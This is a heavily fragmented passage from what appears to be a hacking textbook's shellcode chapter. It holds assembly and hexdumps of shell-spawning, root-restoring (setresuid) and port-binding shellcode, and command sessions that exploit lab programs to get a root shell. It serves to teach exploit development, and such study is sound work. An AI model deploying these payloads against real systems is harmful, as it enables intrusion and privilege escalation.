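/* Returns 1 if a 4-byte value repeated `repeats` times, placed directly
 * after the sled and payload, is aligned with and fully covers the 4 bytes
 * at ret_offset. Hypothetical helper for checking buffer layout arithmetic. */
int repeats_cover_offset(size_t sled, size_t payload,
                         size_t repeats, size_t ret_offset) {
    size_t start = sled + payload;       /* first byte of the repeated value */
    size_t end = start + repeats * 4;    /* one past the last repeated byte */

    if (ret_offset < start)
        return 0;                        /* offset falls inside sled/payload */
    if ((ret_offset - start) % 4 != 0)
        return 0;                        /* repetitions are misaligned */
    return ret_offset + 4 <= end;        /* all four bytes are covered */
}
```

Calling repeats_cover_offset(300, 92, 38, 540) returns 1, while 37 repetitions would stop exactly at offset 540 and return 0.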
SHELLCODE
So far, the shellcode used in our exploits has been just a string of copied and
pasted bytes
...
Shellcode is also sometimes referred
to as an exploit payload, since these self-contained programs do the real work
once a program has been hacked
...

Unfortunately, for many hackers the shellcode story stops at copying and pasting
bytes
...
Custom
shellcode gives you absolute control over the exploited program
...
Once you know how to write your own shellcode, your
exploits are limited only by your imagination
...

Assembly vs
...
Writing a program in assembly
is different than writing it in C, but many of the principles are similar
...
Compiled C programs ultimately
perform these tasks by making system calls to the kernel
...

In C, standard libraries are used for convenience and portability
...
A C
program compiled on an x86 processor will produce x86 assembly language
...
There are no standard libraries; instead,
kernel system calls have to be made directly
...

Assembly vs
...
c
#include ...
The strace program is used to trace a program's system calls
...

reader@hacking:~/booksrc $ gcc helloworld
...
/a
...
/a
...
/a
...
so
...
so
...
so
...
}) = 0
mmap2(NULL, 61323, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ee7000
close(3) = 0
access("/etc/ld
...
nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc
...
6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20Z\1\000"
...
}) = 0
mmap2(NULL, 1258876, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7db3000
mmap2(0xb7ee0000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x12c) = 0xb7ee0000
mmap2(0xb7ee4000, 9596, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ee4000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db2000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7db26b0, limit:1048575, seg_32bit:1,
contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7ee0000, 8192, PROT_READ) = 0
munmap(0xb7ee7000, 61323) = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2),
...
The
system calls at the start are setting up the environment and memory for the
program, but the important part is the write() syscall shown in bold
...

The Unix manual pages (accessed with the man command) are separated into
sections
...
h>
ssize_t write(int fd, const void *buf, size_t count);
DESCRIPTION
write() writes up to count bytes to the file referenced by the file
descriptor fd from the buffer starting at buf
...
Note that not all file systems are POSIX conforming
...
The buf and count
arguments are a pointer to our string and its length
...
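
As a quick illustration of those three arguments, the following sketch calls write() directly instead of going through printf(). The wrapper name write_string() is an assumption made for this example; write(), strlen(), and STDOUT_FILENO are the standard ones.

```c
#include <string.h>
#include <unistd.h>

/* Write a null-terminated string to a file descriptor using write().
 * fd is the descriptor, s is the buffer pointer, strlen(s) is the count.
 * Returns the number of bytes written, or -1 on error. */
ssize_t write_string(int fd, const char *s) {
    return write(fd, s, strlen(s));
}
```

Calling write_string(STDOUT_FILENO, "Hello, world!\n") asks the kernel to write 14 bytes to standard output, the same request that shows up in the strace output.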
File descriptors are used for almost everything in
Unix: input, output, file access, network sockets, and so on
...
Opening a file descriptor is like
checking in your coat, since you are given a number that can later be used to
reference your coat
...
These values are
standard and have been defined in several places, such as the
/usr/include/unistd
...

From /usr/include/unistd
...
*/
#define STDIN_FILENO 0 /* Standard input
...
*/
#define STDERR_FILENO 2 /* Standard error output
...
The standard error file
descriptor of 2 is used to display the error or debugging messages that can be
filtered from the standard output
...
These syscalls are listed in
/usr/include/asm-i386/unistd
...

From /usr/include/asm-i386/unistd
...

*/
#define __NR_restart_syscall 0
#define __NR_exit 1
#define __NR_fork 2
#define __NR_read 3
#define __NR_write 4
#define __NR_open 5
#define __NR_close 6
#define __NR_waitpid 7
#define __NR_creat 8
#define __NR_link 9
#define __NR_unlink 10
#define __NR_execve 11
#define __NR_chdir 12
#define __NR_time 13
#define __NR_mknod 14
#define __NR_chmod 15
#define __NR_lchown 16
#define __NR_break 17
#define __NR_oldstat 18
#define __NR_lseek 19
#define __NR_getpid 20
#define __NR_mount 21
#define __NR_umount 22
#define __NR_setuid 23
#define __NR_getuid 24
#define __NR_stime 25
#define __NR_ptrace 26
#define __NR_alarm 27
#define __NR_oldfstat 28
#define __NR_pause 29
#define __NR_utime 30
#define __NR_stty 31
#define __NR_gtty 32
#define __NR_access 33
#define __NR_nice 34
#define __NR_ftime 35
#define __NR_sync 36
#define __NR_kill 37
#define __NR_rename 38
#define __NR_mkdir 39

...
c in assembly, we will make a system call to the
write() function for the output and then a second system call to exit() so the
process quits cleanly
...
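
Before dropping down to assembly, the idea of calling the kernel by number can be tried from C. This is a sketch that assumes a Linux system with glibc, where syscall() and the SYS_write constant are available; the wrapper name raw_write() is made up. Note that the number behind SYS_write depends on the architecture: it is 4 in the 32-bit x86 list above, but a 64-bit x86 build uses a different table.

```c
#define _GNU_SOURCE
#include <sys/syscall.h>
#include <unistd.h>

/* Issue the write system call by number, bypassing the libc write()
 * wrapper. Returns the number of bytes written, or -1 on error. */
long raw_write(int fd, const void *buf, unsigned long count) {
    return syscall(SYS_write, fd, buf, count);
}
```

raw_write(1, "Hello, world!\n", 14) prints the greeting. The assembly version does the same job by loading the syscall number and the three arguments into registers by hand.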

Assembly instructions for the x86 processor have one, two, three, or no operands
...
The x86 processor has several 32-bit registers that can be
viewed as hardware variables
...

The mov instruction copies a value between its two operands
...
The int
instruction sends an interrupt signal to the kernel, defined by its single operand
...
When the int 0x80 instruction is executed, the kernel will make a system call
based on the first four registers
...
All of these registers can be set
using the mov instruction
...

The string "Hello, world!" with a newline character (0x0a) is in the data
segment, and the actual assembly instructions are in the text segment
...

helloworld
...
data ; Data segment
msg db "Hello, world!", 0x0a ; The string and newline char
section
...

mov ebx, 1 ; Put 1 into ebx, since stdout is 1
...

mov edx, 14 ; Put 14 into edx, since our string is 14 bytes
...

; SYSCALL: exit(0)
mov eax, 1 ; Put 1 into eax, since exit is syscall #1
...

int 0x80 ; Do the syscall
...
For the write() syscall to
standard output, the value of 4 is put in EAX since the write() function is system
call number 4
...
Next, the address of the
string in the data segment is put into ECX, and the length of the string (in this
case, 14 bytes) is put into EDX
...

To exit cleanly, the exit() function needs to be called with a single argument of 0
...
Then the
system call interrupt is triggered again
...
When compiling C code, the GCC compiler
takes care of all of this automatically
...

The nasm assembler with the -f elf argument will assemble the helloworld
...
By default, this object file
will be called helloworld
...
The linker program ld will produce an executable a
...

reader@hacking:~/booksrc $ nasm -f elf helloworld
...
o
reader@hacking:~/booksrc $
...
out
Hello, world!
reader@hacking:~/booksrc $

This tiny program works, but it's not shellcode, since it isn't self-contained and
must be linked
...
Since shellcode isn't really an executable program,
we don't have the luxury of declaring the layout of data in memory or even using
other memory segments
...
This is commonly
referred to as position-independent code
...
This is fine as long as EIP doesn't try to interpret
the string as instructions
...
When the shellcode gets executed, it could be anywhere in memory
...
Since
EIP cannot be accessed from assembly instructions, however, we need to use
some sort of trick
...

Instruction Description
push

Push the source operand to the stack
...

call

Call a function, jumping the execution to the address in the location operand
...
The address of the instruction following the call is pushed to the
stack, so that execution can return later
...

Stack-based exploits are made possible by the call and ret instructions
...
After the function is finished, the ret instruction pops
the return address from the stack and jumps EIP back there
...

This architecture can be misused in another way to solve the problem of
addressing the inline string data
...
Instead of calling a function, we can jump past the string to a
pop instruction that will take the address off the stack and into a register
...

helloworld1
...

call mark_below ; Call below the string to instructions
db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes
...

mov eax, 4 ; Write syscall #
...
This also pushes the
address of the next instruction to the stack, the next instruction in our case being
the beginning of the string
...
Without using any memory segments,
these raw instructions, injected into an existing process, will execute in a
completely position-independent way
...

reader@hacking:~/booksrc $ nasm helloworld1
...
Hello, worl|
00000010 64 21 0a 0d 59 b8 04 00 00 00 bb 01 00 00 00 ba |d!
...
|
00000020 0f 00 00 00 cd 80 b8 01 00 00 00 bb 00 00 00 00 |
...
|
00000032
reader@hacking:~/booksrc $ ndisasm -b32 helloworld1
00000000 E80F000000 call 0x14
00000005 48 dec eax
00000006 656C gs insb
00000008 6C insb
00000009 6F outsd
0000000A 2C20 sub al,0x20
0000000C 776F ja 0x7d
0000000E 726C jc 0x7c
00000010 64210A and [fs:edx],ecx
00000013 0D59B80400 or eax,0x4b859
00000018 0000 add [eax],al
0000001A BB01000000 mov ebx,0x1
0000001F BA0F000000 mov edx,0xf
00000024 CD80 int 0x80

00000026 B801000000 mov eax,0x1
0000002B BB00000000 mov ebx,0x0
00000030 CD80 int 0x80
reader@hacking:~/booksrc $

The nasm assembler converts assembly language into machine code and a
corresponding tool called ndisasm converts machine code into assembly
...
The disassembly instructions marked in bold are
the bytes of the "Hello, world!" string interpreted as instructions
...

reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld1)
reader@hacking:~/booksrc $
...
/notesearch
SHELLCODE will be at 0xbffff9c6
reader@hacking:~/booksrc $
...
Why do you think it crashed? In situations like this, GDB is your best
friend
...

Investigating with GDB
Since the notesearch program runs as root, we can't debug it as a normal user
...
Another way to debug programs is with core dumps
...
This means that dumped core files are allowed
to get as big as needed
...

reader@hacking:~/booksrc $ sudo su
root@hacking:/home/reader/booksrc # ulimit -c unlimited
root@hacking:/home/reader/booksrc # export SHELLCODE=$(cat helloworld1)
root@hacking:/home/reader/booksrc #
...
/notesearch
SHELLCODE will be at 0xbffff9a3
root@hacking:/home/reader/booksrc #
...
/core
-rw------- 1 root root 147456 2007-10-26 08:36
...
/core
(no debugging symbols found)
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
/notesearch
£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E
...

#0 0x2c6541b7 in ?? ()
(gdb) set dis intel
(gdb) x/5i 0xbffff9a3
0xbffff9a3: call 0x2c6541b7
0xbffff9a8: ins BYTE PTR es:[edi],[dx]
0xbffff9a9: outs [dx],DWORD PTR ds:[esi]
0xbffff9aa: sub al,0x20
0xbffff9ac: ja 0xbffffa1d
(gdb) i r eip
eip 0x2c6541b7 0x2c6541b7
(gdb) x/32xb 0xbffff9a3
0xbffff9a3: 0xe8 0x0f 0x48 0x65 0x6c 0x6c 0x6f 0x2c
0xbffff9ab: 0x20 0x77 0x6f 0x72 0x6c 0x64 0x21 0x0a
0xbffff9b3: 0x0d 0x59 0xb8 0x04 0xbb 0x01 0xba 0x0f
0xbffff9bb: 0xcd 0x80 0xb8 0x01 0xbb 0xcd 0x80 0x00
(gdb) quit
root@hacking:/home/reader/booksrc # hexdump -C helloworld1
00000000 e8 0f 00 00 00 48 65 6c 6c 6f 2c 20 77 6f 72 6c |
...
Y
...
|
00000030 cd 80 |
...
Since we are
running GDB as root, the
...
The memory where the
shellcode should be is examined
...
At least, execution was
redirected, but something went wrong with the shellcode bytes
...
This, however, totally destroys the meaning of the machine
code
...
Such functions will simply terminate at the first null byte,
producing incomplete and unusable shellcode in memory
...

Removing Null Bytes
Looking at the disassembly, it is obvious that the first null bytes come from the
call instruction
...
The call instruction allows for much longer jump distances, which
means that a small value like 19 will have to be padded with leading zeros
resulting in null bytes
...
A small
negative number will have its leading bits turned on, resulting in 0xff bytes
...
The following revision
of the helloworld shellcode uses a standard implementation of this trick: Jump to
the end of the shellcode to a call instruction which, in turn, will jump back to a pop
instruction at the beginning of the shellcode
...
s
BITS 32 ; Tell nasm this is 32-bit code
...

two:

; ssize_t write(int fd, const void *buf, size_t count);
pop ecx ; Pop the return address (string ptr) into ecx
...

mov ebx, 1 ; STDOUT file descriptor
mov edx, 15 ; Length of the string
int 0x80 ; Do syscall: write(1, string, 15)
; void _exit(int status);
mov eax, 1 ; Exit syscall #
mov ebx, 0 ; Status = 0
int 0x80 ; Do syscall: exit(0)
one:
call two ; Call back upwards to avoid null bytes
db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes
...
This solves the first and most
difficult null-byte problem for this shellcode, but there are still many other null
bytes (shown in bold)
...
s
reader@hacking:~/booksrc $ ndisasm -b32 helloworld2
00000000 EB1E jmp short 0x20
00000002 59 pop ecx
00000003 B804000000 mov eax,0x4
00000008 BB01000000 mov ebx,0x1
0000000D BA0F000000 mov edx,0xf

00000012 CD80 int 0x80
00000014 B801000000 mov eax,0x1
00000019 BB00000000 mov ebx,0x0
0000001E CD80 int 0x80
00000020 E8DDFFFFFF call 0x2

00000025 48 dec eax
00000026 656C gs insb
00000028 6C insb
00000029 6F outsd
0000002A 2C20 sub al,0x20
0000002C 776F ja 0x9d
0000002E 726C jc 0x9c
00000030 64210A and [fs:edx],ecx
00000033 0D db 0x0D
reader@hacking:~/booksrc $
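
The two call encodings seen so far, E8 0F 00 00 00 and E8 DD FF FF FF, can be reproduced with a bit of C. A near call stores a signed 32-bit displacement measured from the end of the 5-byte instruction. The sketch below computes that displacement and counts its zero bytes; both function names are hypothetical.

```c
#include <stdint.h>

/* Displacement stored in a 5-byte near call located at call_addr that
 * targets target: relative to the address of the next instruction. */
int32_t call_rel32(uint32_t call_addr, uint32_t target) {
    return (int32_t)(target - (call_addr + 5));
}

/* Count the zero bytes in the 4-byte encoding of a displacement. */
int null_bytes_in_rel32(int32_t rel) {
    uint32_t v = (uint32_t)rel;
    int count = 0;
    for (int i = 0; i < 4; i++) {
        if (((v >> (8 * i)) & 0xff) == 0)
            count++;
    }
    return count;
}
```

The forward call at offset 0 to 0x14 gives a displacement of 0x0f and three null bytes. The backward call at offset 0x20 to 0x2 gives -35, which is 0xffffffdd as an unsigned value, and no null bytes at all.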

These remaining null bytes can be eliminated with an understanding of register
widths and addressing
...

This means execution can only jump a maximum of approximately 128 bytes in
either direction
...
The difference between
assembled machine code for the two jump varieties is shown below:

EB 1E jmp short 0x20

versus

E9 1E 00 00 00 jmp 0x23

The EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP registers are 32 bits in width
...
These original 16-bit versions of the registers can
still be used for accessing the first 16 bits of each corresponding 32-bit register
...
Naturally, assembly instructions using the
smaller registers only need to specify operands up to the register's bit width
...

Machine code      Assembly
B8 04 00 00 00    mov eax,0x4
66 B8 04 00       mov ax,0x4
B0 04             mov al,0x4

Using the AL, BL, CL, or DL register will put the correct least significant byte into
the corresponding extended register without creating any null bytes in the
machine code
...
This is especially true for shellcode, since it will be taking over another
process
...
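
The effect of writing only to the low byte of a register can be modeled in C with a mask. This is just a sketch to show why the rest of the register matters; set_low_byte() is an invented name, and the uint32_t value stands in for a register like EAX.

```c
#include <stdint.h>

/* Model of "mov al, value": replace only the least significant byte of a
 * 32-bit register value, leaving the upper three bytes untouched. */
uint32_t set_low_byte(uint32_t reg, uint8_t value) {
    return (reg & 0xffffff00u) | value;
}
```

If the register already holds 0xdeadbeef, set_low_byte() with 4 produces 0xdeadbe04 rather than 4. The full register only ends up holding 4 if its upper three bytes were zero beforehand.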
Here are some more simple assembly instructions for
your arsenal
...

Instruction Description
inc

Increment the target operand by adding 1 to it
...

The next few instructions, like the mov instruction, have two operands
...

Instruction Description
add <dest>, <source>

Add the source operand to the destination operand, storing the result in the destination
...

Perform a bitwise or logic operation, comparing each bit of one operand with the
corresponding bit of the other operand
...
The final result is stored in the destination operand
...

and <dest>, <source>

1 and 0 = 0
1 and 1 = 1
0 and 1 = 0
0 and 0 = 0
The result bit is on only if both the source bit and the destination bit are on
...

Perform a bitwise exclusive or (xor) logical operation, comparing each bit of one operand with
the corresponding bit of the other operand
...
The final
result is stored in the destination operand
...
Can you think of a way to optimize
this technique? The DWORD value specified in each instruction comprises 80
percent of the code
...
This can be done with a single two-byte instruction:

29 C0 sub eax,eax

Using the sub instruction will work fine when zeroing registers at the beginning
of shellcode
...
For that reason, there is a preferred two-byte instruction
that is used to zero registers in most shellcode
...
Since 1 xored with 1 results in a
0, and 0 xored with 0 results in a 0, any value xored with itself will result in 0
...

31 C0 xor eax,eax
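
The same property holds for C's bitwise operators, which makes it easy to convince yourself that the starting value doesn't matter. The two function names below are made up for this small demonstration.

```c
#include <stdint.h>

/* Model of "xor reg, reg": every bit is xored with itself, giving 0. */
uint32_t zero_by_xor(uint32_t value) {
    return value ^ value;
}

/* Model of "sub reg, reg": any value minus itself is also 0. */
uint32_t zero_by_sub(uint32_t value) {
    return value - value;
}
```

Both functions return 0 for any input, whether it is 0, 0xdeadbeef, or 0xffffffff.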

You can safely use the sub instruction to zero registers (if done at the beginning
of the shellcode), but the xor instruction is most commonly used in shellcode in
the wild
...
The inc and dec instructions have also been
used when possible to make for even smaller shellcode
...
s
BITS 32 ; Tell nasm this is 32-bit code
...

two:
; ssize_t write(int fd, const void *buf, size_t count);
pop ecx ; Pop the return address (string ptr) into ecx
...

mov al, 4 ; Write syscall #4 to the low byte of eax
...

inc ebx ; Increment ebx to 1, STDOUT file descriptor
...

dec ebx ; Decrement ebx back down to 0 for status = 0
...

After assembling this shellcode, hexdump and grep are used to quickly check it
for null bytes
...
s
reader@hacking:~/booksrc $ hexdump -C helloworld3 | grep --color=auto 00
00000000 eb 13 59 31 c0 b0 04 31 db 43 31 d2 b2 0f cd 80 |
...
1
...
|
00000010 b0 01 4b cd 80 e8 e8 ff ff ff 48 65 6c 6c 6f 2c |
...
Hello,|
00000020 20 77 6f 72 6c 64 21 0a 0d | world!
...
When used with
an exploit, the notesearch program is coerced into greeting the world like a
newbie
...
/getenvaddr SHELLCODE
...
/notesearch $(perl -e 'print "\xbc\xf9\xff\xbf"x40')
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]------Hello, world!
reader@hacking:~/booksrc $

Shell-Spawning Shellcode
Now that you've learned how to make system calls and avoid null bytes, all sorts of
shellcodes can be constructed
...
System call number 11, execve(), is
similar to the C execute() function that we used in the previous chapters
...
h>
int execve(const char *filename, char *const argv[],
char *const envp[]);
DESCRIPTION
execve() executes the program pointed to by filename
...
In the latter case, the interpreter must
be a valid pathname for an executable which is not itself a script,
which will be invoked as interpreter [arg] filename
...
envp
is an array of strings, conventionally of the form key=value, which are
passed as environment to the new program
...
The argument vector and environment can
be accessed by the called program's main function, when it is defined
as int main(int argc, char *argv[], char *envp[])
...
The environment array, the third
argument, can be empty, but it still needs to be terminated with a 32-bit null
pointer
...
Done in C, a program making this call would look like this:

exec_shell
...
h>
int main() {
char filename[] = "/bin/sh\x00";
char *argv[2], *envp[1]; // Arrays that contain char pointers
argv[0] = filename; // The only argument is filename
...

envp[0] = 0; // Null terminate the environment array
...
In addition, the "/bin/sh" string needs to be terminated with a null
byte
...
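
The null-terminated arrays that execve() expects can also be written as ordinary C initializers. The sketch below is a variation, not the listing above: it forks first so the calling program survives, runs the new program in the child with an empty environment, and returns the child's exit status. The name exec_and_wait() is an assumption for this example.

```c
#include <stddef.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run filename with the given null-terminated argument array and an empty
 * environment, then wait for it to finish.
 * Returns the child's exit status, or -1 on failure. */
int exec_and_wait(const char *filename, char *const argv[]) {
    char *const envp[] = { NULL };    /* empty, but still null terminated */
    int status;
    pid_t pid = fork();

    if (pid == -1)
        return -1;
    if (pid == 0) {                   /* child: replace the process image */
        execve(filename, argv, envp);
        _exit(127);                   /* only reached if execve() failed */
    }
    if (waitpid(pid, &status, 0) == -1)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

For example, with an argument array of { "/bin/sh", "-c", "exit 7", NULL }, the function returns 7 once the child shell exits.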
Dealing with memory in assembly is
similar to using pointers in C
...

Instruction Description

lea <dest>, <source>

Load the effective address of the source operand into the destination operand
...
For example, the following instruction in
assembly will treat EBX+12 as a pointer and write eax to where it's pointing
...
The environment array is collapsed into the end of the
argument array, so they share the same 32-bit null terminator
...
s
BITS 32
jmp short two ; Jump down to the bottom for the call trick
...

xor eax, eax ; Put 0 into eax
...

mov [ebx+8], ebx ; Put addr from ebx where the AAAA is
...

lea ecx, [ebx+8] ; Load the address of [ebx+8] into ecx for argv ptr
...

mov al, 11 ; Syscall #11
int 0x80 ; Do it
...

db '/bin/shXAAAABBBB' ; The XAAAABBBB bytes aren't needed
...
Loading the effective address of a bracketed register added to a
value is an efficient way to add the value to the register and store the result in
another register
...
Loading the address of a
dereferenced pointer produces the original pointer, so this instruction puts
EBX+8 into EDX
...
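
In C terms, lea behaves like taking the address of an array element without ever reading the element. The one-line function below is only an analogy, and its name is invented for this sketch.

```c
#include <stddef.h>

/* C analogy for "lea dest, [base+disp]": compute the address of the byte
 * at base+disp without dereferencing it. */
unsigned char *effective_address(unsigned char *base, size_t disp) {
    return &base[disp];    /* &*(base + disp) is simply base + disp */
}
```

Given a 16-byte buffer buf, effective_address(buf, 8) is the same pointer as buf + 8, and no memory is read to produce it.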

When assembled, this shellcode is devoid of null bytes
...

reader@hacking:~/booksrc $ nasm exec_shell
...
[1
...
C
...
S
...
/getenvaddr SHELLCODE
...
/notesearch $(perl -e 'print "\xc0\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]------sh-3
...
2#

This shellcode, however, can be shortened to less than the current 45 bytes
...
The
smaller the shellcode, the more situations it can be used in
...

reader@hacking:~/booksrc/shellcodes $ hexdump -C exec_shell
00000000 eb 16 5b 31 c0 88 43 07 89 5b 08 89 43 0c 8d 4b |
...
C
...
K|
00000010 08 8d 53 0c b0 0b cd 80 e8 e5 ff ff ff 2f 62 69 |
...
/bi|
00000020 6e 2f 73 68 |n/sh|
00000024
reader@hacking:~/booksrc/shellcodes $ wc -c exec_shell
36 exec_shell
reader@hacking:~/booksrc/shellcodes $

This shellcode can be shrunk down further by redesigning it and using registers
more efficiently
...
When a value is pushed to the stack, ESP is moved up in memory (by
subtracting 4) and the value is placed at the top of the stack
...

The following shellcode uses push instructions to build the necessary structures in
memory for the execve() system call
...
s
BITS 32

; execve(const char *filename, char *const argv [], char *const envp[])
xor eax, eax ; Zero out eax
...

push 0x68732f2f ; Push "//sh" to the stack
...

mov ebx, esp ; Put the address of "/bin//sh" into ebx, via esp
...

mov edx, esp ; This is an empty array for envp
...

mov ecx, esp ; This is the argv array with string ptr
...

int 0x80 ; Do it
...
The extra slash doesn't matter and is effectively
ignored
...
The resulting shellcode still spawns a shell but is only 25 bytes,
compared to 36 bytes using the jmp call method
...
s
reader@hacking:~/booksrc $ wc -c tiny_shell
25 tiny_shell
reader@hacking:~/booksrc $ hexdump -C tiny_shell
00000000 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 |1
...
P|
00000010 89 e2 53 89 e1 b0 0b cd 80 |
...
|
00000019
reader@hacking:~/booksrc $ export SHELLCODE=$(cat tiny_shell)
reader@hacking:~/booksrc $
...
/notesearch
SHELLCODE will be at 0xbffff9cb
reader@hacking:~/booksrc $
...
2#

A Matter of Privilege
To help mitigate rampant privilege escalation, some privileged processes will
lower their effective privileges while doing things that don't require that kind of
access
...
By changing the effective user ID, the privileges of the process can be
changed
...

SETEGID(2) Linux Programmer's Manual SETEGID(2)
NAME
seteuid, setegid - set effective user or group ID
SYNOPSIS
#include ...
h>

int seteuid(uid_t euid);
int setegid(gid_t egid);
DESCRIPTION
seteuid() sets the effective user ID of the current process
...

Precisely the same holds for setegid() with "group" instead of "user"
...
On error, -1 is returned, and errno is
set appropriately
...

drop_privs
...
h>
void lowered_privilege_function(unsigned char *ptr) {
char buffer[50];
seteuid(5); // Drop privileges to games user
...
This only spawns a shell for the
games user, without root access
...
c
reader@hacking:~/booksrc $ sudo chown root
...
/drop_privs
reader@hacking:~/booksrc $ export SHELLCODE=$(cat tiny_shell)
reader@hacking:~/booksrc $
...
/drop_privs
SHELLCODE will be at 0xbffff9cb
reader@hacking:~/booksrc $
...
2$ whoami
games
sh-3
...
2$

Fortunately, the privileges can easily be restored at the beginning of our
shellcode with a system call to set the privileges back to root
...
The system call number and manual page are shown below
...
h
#define __NR_setresuid 164

#define __NR_setresuid32 208
reader@hacking:~/booksrc $ man 2 setresuid

SETRESUID(2) Linux Programmer's Manual SETRESUID(2)
NAME
setresuid, setresgid - set real, effective and saved user or group ID
SYNOPSIS
#define _GNU_SOURCE
#include ...

The following shellcode makes a call to setresuid() before spawning the shell to
restore root privileges
...
s
BITS 32
; setresuid(uid_t ruid, uid_t euid, uid_t suid);
xor eax, eax ; Zero out eax
...

xor ecx, ecx ; Zero out ecx
...

mov al, 0xa4 ; 164 (0xa4) for syscall #164
int 0x80 ; setresuid(0, 0, 0) Restore all root privs
...

mov al, 11 ; syscall #11
push ecx ; push some nulls for string termination
...

push 0x6e69622f ; push "/bin" to the stack
...

push ecx ; push 32-bit null terminator to stack
...

push ebx ; push string addr to stack above null terminator
...

int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

This way, even if a program is running under lowered privileges when it's
exploited, the shellcode can restore the privileges
...

reader@hacking:~/booksrc $ nasm priv_shell
...
/getenvaddr SHELLCODE
...
/drop_privs $(perl -e 'print "\xbf\xf9\xff\xbf"x40')
sh-3
...
2# id
uid=0(root) gid=999(reader)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(reader)
sh-3
...
There is a single-byte x86
instruction called cdq, which stands for convert doubleword to quadword
...
Since the registers are 32-bit doublewords, it takes two registers to store a 64-bit quadword
...

Operationally, this means if the sign bit of EAX is 0, the cdq instruction will zero
the EDX register
...
Since the stack is 32-bit
aligned, a single byte value pushed to the stack will be aligned as a doubleword
...

The instructions that push a single byte and pop it back into a register take three
bytes, while using xor to zero the register and moving a single byte takes four
bytes:

31 C0 xor eax,eax
B0 0B mov al,0xb

compared to

6A 0B push byte +0xb
58 pop eax

These tricks (shown in bold) are used in the following shellcode listing
...

shellcode
...

xor ebx, ebx ; Zero out ebx
...

cdq ; Zero out edx using the sign bit from eax
...

; execve(const char *filename, char *const argv [], char *const envp[])
push BYTE 11 ; push 11 to the stack
...

push ecx ; push some nulls for string termination
...

push 0x6e69622f ; push "/bin" to the stack
...

push ecx ; push 32-bit null terminator to stack
...

push ebx ; push string addr to stack above null terminator
...

int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

The syntax for pushing a single byte requires the size to be declared
...
These sizes
can be implied from register widths, so moving into the AL register implies the
BYTE size
...

Port-Binding Shellcode
When exploiting a remote program, the shellcode we've designed so far won't
work
...
Port-binding shellcode will bind the shell to a network
port where it listens for incoming connections
...
The following C code binds to
port 31337 and listens for a TCP connection
...
c
#include ...
h>
#include ...
h>
#include ...
sin_family = AF_INET; // Host byte order
host_addr
...
sin_addr
...

memset(&(host_addr
...

bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
listen(sockfd, 4);
sin_size = sizeof(struct sockaddr_in);
new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
}

These familiar socket functions can all be accessed with a single Linux system call,
aptly named socketcall()
...

reader@hacking:~/booksrc $ grep socketcall /usr/include/asm-i386/unistd
...
call
determines which socket function to invoke
...

User programs should call the appropriate functions by their usual
names
...

The possible call numbers for the first argument are listed in the linux/net
...

From /usr/include/linux/net
...
The calls are simple enough, but some of them require a sockaddr
structure, which must be built by the shellcode
...

reader@hacking:~/booksrc $ gcc -g bind_port
...
/a
...
so
...

(gdb) list 18
13 sockfd = socket(PF_INET, SOCK_STREAM, 0);
14
15 host_addr
...
sin_port = htons(31337); // Short, network byte order
17 host_addr
...
s_addr = INADDR_ANY; // Automatically fill with my IP
...
sin_zero), '\0', 8); // Zero the rest of the struct
...
c, line 13
...
c, line 20
...
out
Breakpoint 1, main () at bind_port
...
All three arguments are pushed to the
stack (but with mov instructions) in reverse order
...

(gdb) cont
Continuing
...
c:20
20 bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
(gdb) print host_addr
$1 = {sin_family = 2, sin_port = 27002, sin_addr = {s_addr = 0},
sin_zero = "\000\000\000\000\000\000\000"}
(gdb) print sizeof(struct sockaddr)
$2 = 16
(gdb) x/16xb &host_addr
0xbffff780: 0x02 0x00 0x7a 0x69 0x00 0x00 0x00 0x00
0xbffff788: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) p /x 27002
$3 = 0x697a
(gdb) p 0x7a69
$4 = 31337
(gdb)

The next breakpoint happens after the sockaddr structure is filled with values
...
The sin_family and sin_port elements are both
words, followed by the address as a DWORD
...
The remaining eight bytes after that
are just extra space in the structure
...

The following assembly instructions perform all the socket calls needed to bind to
port 31337 and accept TCP connections
...
The last eight bytes of the sockaddr structure
aren't actually pushed to the stack, since they aren't used
...

bind_port
...

pop eax
cdq ; Zero out edx for use as a null DWORD later
...

inc ebx ; 1 = SYS_SOCKET = socket()
push edx ; Build arg array: { protocol = 0,
